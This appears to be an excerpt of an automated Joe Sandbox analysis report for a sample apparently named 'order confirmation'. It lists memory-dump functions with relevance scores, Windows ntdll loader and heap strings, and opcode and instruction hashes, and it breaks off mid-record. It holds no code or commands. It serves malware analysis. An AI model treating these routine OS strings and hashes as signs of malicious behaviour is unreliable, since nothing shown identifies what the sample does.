                                                    Function 013D0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0141A121
                                                    • Failed to allocated memory for shimmed module list, xrefs: 0141A10F
                                                    • LdrpCheckModule, xrefs: 0141A117
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-161242083
                                                    • Opcode ID: a631e5a0e0727c515cce23c3690fc42dd1b02d3df306a73566915c2328bbaf9b
                                                    • Instruction ID: 2983e3e291ec7908d4c44e701427f5e219d4689c780991cbaf981e90f01c668e
                                                    • Opcode Fuzzy Hash: a631e5a0e0727c515cce23c3690fc42dd1b02d3df306a73566915c2328bbaf9b
                                                    • Instruction Fuzzy Hash: 8671D1B1A002059FDF29DF6CD980ABEBBF4FB44A08F19402DE506AB765E734AD41CB50
                                                    Function 013C0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-1334570610
                                                    • Opcode ID: f4f6f1569689dc7554fb05074ccd3c5cabe3cb66285cfb3f9dd4ffe296452360
                                                    • Instruction ID: f209865d57941bdbd0218a08a61b2dac6729e907fbc50a158814f57214d5bac9
                                                    • Opcode Fuzzy Hash: f4f6f1569689dc7554fb05074ccd3c5cabe3cb66285cfb3f9dd4ffe296452360
                                                    • Instruction Fuzzy Hash: DA61E074600345DFEB29CF28C480BAABBE5FF45B08F14855EE4598F2A6D770E881CB90
                                                    Function 013EC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 014282E8
                                                    • Failed to reallocate the system dirs string !, xrefs: 014282D7
                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 014282DE
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-1783798831
                                                    • Opcode ID: eb5c52c2c1b348e672af31d733c101975e7702d7d3d81d591edaef5fad665feb
                                                    • Instruction ID: c23c12ac1880e69b163a08ae845971daf04fec23510a3b9bdf722f28b719c318
                                                    • Opcode Fuzzy Hash: eb5c52c2c1b348e672af31d733c101975e7702d7d3d81d591edaef5fad665feb
                                                    • Instruction Fuzzy Hash: 6F41E472540325AFD721EB6CD844B5F7BE8EF54B58F46892AF948D72A0EB70D800CB91
                                                    Function 0146C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • @, xrefs: 0146C1F1
                                                    • PreferredUILanguages, xrefs: 0146C212
                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0146C1C5
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                    • API String ID: 0-2968386058
                                                    • Opcode ID: d44b02483116f3e632dff15b7d50a7a5461e1b599dff7d72af70863989c650a9
                                                    • Instruction ID: a150486e8eb63ff13dc0714f9924d3a23a45c620a103b11abf7f0bcc787cabdc
                                                    • Opcode Fuzzy Hash: d44b02483116f3e632dff15b7d50a7a5461e1b599dff7d72af70863989c650a9
                                                    • Instruction Fuzzy Hash: 09416271E0020AEBDF11DBD8C881BEFBBBCAB14718F14406BEA49A7260D7749A458B51
                                                    Function 01444144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                    • API String ID: 0-1373925480
                                                    • Opcode ID: 8b551baaaf282075f38f594e85aedec1363ccde1b69c85d4464242a5d74af159
                                                    • Instruction ID: 55a1426ecdee01a6f9fa44f7773059998c906e9108f7eef81f3461b12dc79824
                                                    • Opcode Fuzzy Hash: 8b551baaaf282075f38f594e85aedec1363ccde1b69c85d4464242a5d74af159
                                                    • Instruction Fuzzy Hash: AC411371A046488BFB22DBD9C844BAEBBB4FF55384F18045BD901EB7A1D7349901CB11
                                                    Function 01434755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01434888
                                                    • LdrpCheckRedirection, xrefs: 0143488F
                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01434899
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                    • API String ID: 0-3154609507
                                                    • Opcode ID: d2f53c51bb7b0e3fa512b2b3f9373b4a7ba5c014d0a04f09f7636cfdff98e331
                                                    • Instruction ID: a59b6cd7b3a0b0008a54d1482b4ae278a05a27e9b680b01950ebe0d6a0b94157
                                                    • Opcode Fuzzy Hash: d2f53c51bb7b0e3fa512b2b3f9373b4a7ba5c014d0a04f09f7636cfdff98e331
                                                    • Instruction Fuzzy Hash: 5341CF3AA142519BCB26CF29D840AA7BBE5AFCDB50B1A055FED489B371D730D800CB91
                                                    Function 013C0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-2558761708
                                                    • Opcode ID: cd1c9a941e54c16d72543a06e7f083ccb59163bdf9e1816ba1b3f3c0ba831059
                                                    • Instruction ID: 387ed38da5562c7e1609fc7b163946080f6f425336eb97efb95b7caa81dd08e7
                                                    • Opcode Fuzzy Hash: cd1c9a941e54c16d72543a06e7f083ccb59163bdf9e1816ba1b3f3c0ba831059
                                                    • Instruction Fuzzy Hash: B111AE35395181DFD629DA18C440BA6B7A4EB82B19F18812EF4068F269DB30DC41C750
                                                    Function 014320DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01432104
                                                    • Process initialization failed with status 0x%08lx, xrefs: 014320F3
                                                    • LdrpInitializationFailure, xrefs: 014320FA
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-2986994758
                                                    • Opcode ID: 2b9a557a82f890365b654b6d2082ea2bf7b50d718ce48c9bb448b0615042058f
                                                    • Instruction ID: 0019028c5fe3d3319bbd215de92dd5e86541822ad5e929f12089fb6fc8041514
                                                    • Opcode Fuzzy Hash: 2b9a557a82f890365b654b6d2082ea2bf7b50d718ce48c9bb448b0615042058f
                                                    • Instruction Fuzzy Hash: 98F0C875640309BBEB24EA4DDD42F977F68EB84B58F51005AF6047B395D1F0A940CA91
                                                    Function 013C03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: #%u
                                                    • API String ID: 48624451-232158463
                                                    • Opcode ID: c44021722dcdeeb37e6e979136a1a689c7e9ced5938e9a38de0850c675eeabd5
                                                    • Instruction ID: 2c32e8ba161e594422a84261333b95273137a595c7bdd94b8ca1ba5925cff950
                                                    • Opcode Fuzzy Hash: c44021722dcdeeb37e6e979136a1a689c7e9ced5938e9a38de0850c675eeabd5
                                                    • Instruction Fuzzy Hash: 44715C71A0014A9FDB05DFA9C994BAEB7F8FF18704F15406AE905E7261EB34ED01CBA0
                                                    Function 013BA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • LdrResSearchResource Enter, xrefs: 013BAA13
                                                    • LdrResSearchResource Exit, xrefs: 013BAA25
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                    • API String ID: 0-4066393604
                                                    • Opcode ID: e26e79876e379cedf01ceef3a96930cdcfde804def4ca321522d3cebf4de6497
                                                    • Instruction ID: 20e519a38c8f06e39ee95704fa6c9b1562e731b7232654ec3dcf3a2f69b0fd7b
                                                    • Opcode Fuzzy Hash: e26e79876e379cedf01ceef3a96930cdcfde804def4ca321522d3cebf4de6497
                                                    • Instruction Fuzzy Hash: 21E18171E006199FEF21CF9DC980BEEBBB9BF04318F14442AEA11E7A65E7749941CB50
                                                    Function 0147A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `$`
                                                    • API String ID: 0-197956300
                                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                    • Instruction ID: cab5d24b21fc1038804d125b04219d735143ff7776ed248051fa0ef0d873dd02
                                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                    • Instruction Fuzzy Hash: 2FC1D4312043429BE724CF29C845BAFBBE5AFD4718F284A2EF695CB2A0D775D505CB41
                                                    Function 0142E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: Legacy$UEFI
                                                    • API String ID: 2994545307-634100481
                                                    • Opcode ID: 6376ac9940293bfa72c8132c5a795895eacf709244bd64be95fc950db88be81b
                                                    • Instruction ID: b48860c3f5359b07b6209e72c6f4db9fdf935632a4c1620f253b1cd26ed1ef8a
                                                    • Opcode Fuzzy Hash: 6376ac9940293bfa72c8132c5a795895eacf709244bd64be95fc950db88be81b
                                                    • Instruction Fuzzy Hash: FC616B71E002299FDB14DFA9C840BAEBBB9FB44704F54406EE649EB2A1D771E981CB50
                                                    Function 014543D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$MUI
                                                    • API String ID: 0-17815947
                                                    • Opcode ID: 32cf3042d27560c7e87874c2ed20a041f6898b6b57a10d28c13188a19b9b547f
                                                    • Instruction ID: d742277bbe17674e0eb9582b27a62994379a89e2f6841bdcacde3981cd926104
                                                    • Opcode Fuzzy Hash: 32cf3042d27560c7e87874c2ed20a041f6898b6b57a10d28c13188a19b9b547f
                                                    • Instruction Fuzzy Hash: 4C512A71D0021DAFDF51DFA9CC84AEFBBB8EB44758F14052AEA11BB291E6309D45CB60
                                                    Function 013B04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 013B063D
                                                    • kLsE, xrefs: 013B0540
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                    • API String ID: 0-2547482624
                                                    • Opcode ID: e4a6dc631df09f60264c87d7198d7f37d6513582892ec248e03125ee5922f7d0
                                                    • Instruction ID: 5257ff025431090344233ede5645310ae1de7104cb3161c832164bebb76397bd
                                                    • Opcode Fuzzy Hash: e4a6dc631df09f60264c87d7198d7f37d6513582892ec248e03125ee5922f7d0
                                                    • Instruction Fuzzy Hash: 66517C715047428BD728DF68C5807E7BBF4EF94318F14483EE6AA87A41F770A545CB92
                                                    Function 013BA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 013BA309
                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 013BA2FB
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                    • API String ID: 0-2876891731
                                                    • Opcode ID: a4b9492d2527830f8fc6696e7f79288922565c926503e5e41b343519d8b7fc84
                                                    • Instruction ID: 86d3173767fc187c5f0be1c2aa6b1ec80f9ec9d16f90057553be64f24ac8a37c
                                                    • Opcode Fuzzy Hash: a4b9492d2527830f8fc6696e7f79288922565c926503e5e41b343519d8b7fc84
                                                    • Instruction Fuzzy Hash: F341B031A05A59DBDB11DF5DC480BAE7BB4FF84708F24406AEA08DBBA5E3B5D900CB50
                                                    Function 013EA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: Cleanup Group$Threadpool!
                                                    • API String ID: 2994545307-4008356553
                                                    • Opcode ID: 3f7c34b7d31cf3c587593949c98b315699cbe95d3d2420713857caa99ad077ed
                                                    • Instruction ID: 0597a406809cbf1e97d95ed8206166a20244d445aa1b20ac56fc4b2bc1c218da
                                                    • Opcode Fuzzy Hash: 3f7c34b7d31cf3c587593949c98b315699cbe95d3d2420713857caa99ad077ed
                                                    • Instruction Fuzzy Hash: 1E01D1B2250704AFD311DF24CE49B167BE8F785729F068979A658C71D0E334D804CB46
                                                    Function 013BC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: MUI
                                                    • API String ID: 0-1339004836
                                                    • Opcode ID: 5b5a48d2fed55ba966d3e840051a7892406cc327bb3d5650e3df7b2c08cf6193
                                                    • Instruction ID: bb445609edc4b43f278e99882f30ddba3bd0a8f2e2bce69c571744e7d704ddcb
                                                    • Opcode Fuzzy Hash: 5b5a48d2fed55ba966d3e840051a7892406cc327bb3d5650e3df7b2c08cf6193
                                                    • Instruction Fuzzy Hash: 3A825D75E002198FEB25CFA9C8C07EDBBB5BF44318F148169EA59ABB51EB309D41CB50
                                                    Function 01436420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: a86e51bef6377dd8b10edc2a8e52850e01924d5493fdb97b4d5e5ec5890aaa9a
                                                    • Instruction ID: 1b07fe068d89d35f33d288629efcc27ccca211ac7c99e2a337f69595e1446181
                                                    • Opcode Fuzzy Hash: a86e51bef6377dd8b10edc2a8e52850e01924d5493fdb97b4d5e5ec5890aaa9a
                                                    • Instruction Fuzzy Hash: 2191637290021ABFEB21DB99DC85FAE7BB8EF58B54F154065F604AB1A0D674AD00CB60
                                                    Function 0145E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: 838a76c078e089f38ea251dfd5fd3b48f0532d9131388a30b0e41aac6d93901e
                                                    • Instruction ID: dbcd99a89da3621e16039f939b79a22567287320a1988e2ffeeff47e049c6692
                                                    • Opcode Fuzzy Hash: 838a76c078e089f38ea251dfd5fd3b48f0532d9131388a30b0e41aac6d93901e
                                                    • Instruction Fuzzy Hash: 59918072900605ABDB22AFA9DC44FEFFB79EF45754F10002AFA05B7262D7349A02CB50
                                                    Function 013EA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: GlobalTags
                                                    • API String ID: 0-1106856819
                                                    • Opcode ID: 3722a6430008c22149d36e48ea4fc8cc234ec4300e3841d76835c0142b8e0a0b
                                                    • Instruction ID: 73334e4645a8d05d6574ea0dd6420b06bd97d3f8a31df5722d52c62ed2211a16
                                                    • Opcode Fuzzy Hash: 3722a6430008c22149d36e48ea4fc8cc234ec4300e3841d76835c0142b8e0a0b
                                                    • Instruction Fuzzy Hash: A1719175E0122ACFDF28CF9DD5806AEBBB1BF88710F55812EE905A7351E7709881CB50
                                                    Function 01454978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .mui
                                                    • API String ID: 0-1199573805
                                                    • Opcode ID: 62a78676522fc55d64f9e1149274a6f9472279e944c0f88ed78908d3c7097448
                                                    • Instruction ID: f8dafdc063d416c0827665667637a2af8849dba38b5d130a24c5a2341be66dac
                                                    • Opcode Fuzzy Hash: 62a78676522fc55d64f9e1149274a6f9472279e944c0f88ed78908d3c7097448
                                                    • Instruction Fuzzy Hash: 9D51A772D002259BDF50DFADD840AEEBBB4AF04614F09412AEE11BB361E7349D41CBE4
                                                    Function 013CE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: EXT-
                                                    • API String ID: 0-1948896318
                                                    • Opcode ID: 512f61578567f1271f6b32818e8e2320a8c0454865bfa748dd6370b21124e676
                                                    • Instruction ID: 0093f79b06e69cb8187e1cb5a270ccd962f8f072090e0fa4ee44f4aa25c3248b
                                                    • Opcode Fuzzy Hash: 512f61578567f1271f6b32818e8e2320a8c0454865bfa748dd6370b21124e676
                                                    • Instruction Fuzzy Hash: 274180725083529BD721DA79D940B6BBBE8AF88A1CF44093DF684E7140EA74DD04C796
                                                    Function 0142C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BinaryHash
                                                    • API String ID: 0-2202222882
                                                    • Opcode ID: cf94d734ed713d02239605ff09d826a8b94d9a055ea01a064b256cff2c4a251a
                                                    • Instruction ID: 465844f2142b30c5f55c5e84d8612086ba8203dba16427e199768ba50d8b5671
                                                    • Opcode Fuzzy Hash: cf94d734ed713d02239605ff09d826a8b94d9a055ea01a064b256cff2c4a251a
                                                    • Instruction Fuzzy Hash: 1C4166B1D0052DAADB21DA54CC84FDEB77CAB54718F4085EAEB08AB150DB709E898F94
                                                    Function 01446B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: #
                                                    • API String ID: 0-1885708031
                                                    • Opcode ID: 2a711413ca69e69e39fc17f2d41143b19a5720abe62ba31b1017b334e51deb62
                                                    • Instruction ID: ebc11a48d5ffedeeec47e3e7921d571d3cc9c1d926fd5950244eac9ea288fd61
                                                    • Opcode Fuzzy Hash: 2a711413ca69e69e39fc17f2d41143b19a5720abe62ba31b1017b334e51deb62
                                                    • Instruction Fuzzy Hash: A0310931A006599BFB22CB6DC850BAFBBA8DF06704F15402AE940AB2A1D775DC45CB54
                                                    Function 0142CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BinaryName
                                                    • API String ID: 0-215506332
                                                    • Opcode ID: 93024c041f565f2bb770d8bc8689c7c7de36f7766769bfa19673d7dbd14f97c3
                                                    • Instruction ID: 8c51e93bc99bfbd2bd2695a6ad8159e49e8381af39451bbfc7147c1c3050dacb
                                                    • Opcode Fuzzy Hash: 93024c041f565f2bb770d8bc8689c7c7de36f7766769bfa19673d7dbd14f97c3
                                                    • Instruction Fuzzy Hash: 7431033690052AAFEB15DB5CD891E6FBF74EB80764F41812AEA05A7260D7309E44DBE0
                                                    Function 0143892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0143895E
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                    • API String ID: 0-702105204
                                                    • Opcode ID: 9ef93632830de2ca164146a603b4ae53dcdf30f1bb7c0c0c97db2dc73ee5a94e
                                                    • Instruction ID: 47735fed80686a682c2df42d512b53dd8cdfddc47f30a7a76742ec132487f296
                                                    • Opcode Fuzzy Hash: 9ef93632830de2ca164146a603b4ae53dcdf30f1bb7c0c0c97db2dc73ee5a94e
                                                    • Instruction Fuzzy Hash: D9012B322002039BE7206F5ADDC4A9BBF75EFD9668B45062FF6411A671CB306841CB92
                                                    Function 01452000 Relevance: .8, Instructions: 757COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 17ba56c50b1d3f4122a01c2c4d102064b457ae879837f556151156ce00f3f59e
                                                    • Instruction ID: 492ebc85b3d1f10d5883457f933c19becffeefc8c4014712ed0ce57183b87f28
                                                    • Opcode Fuzzy Hash: 17ba56c50b1d3f4122a01c2c4d102064b457ae879837f556151156ce00f3f59e
                                                    • Instruction Fuzzy Hash: E542B136608301DBD765CF68C890E6BBBE5AB94304F08492FFE8697362D7B0D845CB52
                                                    Function 01448158 Relevance: .6, Instructions: 617COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: afc8d9ce34d43c1312ea6fbccf285083efd2a83be0dd7e6433cf837f405aadd5
                                                    • Instruction ID: 07379212290d5343c860e2aa76d84ee4256dd383e6d49ce479dd5b4698ea8c61
                                                    • Opcode Fuzzy Hash: afc8d9ce34d43c1312ea6fbccf285083efd2a83be0dd7e6433cf837f405aadd5
                                                    • Instruction Fuzzy Hash: 18424E75A0021A8FEB25CFA9C841BAEBBF5BF48304F14809AE949AB251D7349D85CF50
                                                    Function 013C2840 Relevance: .6, Instructions: 605COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
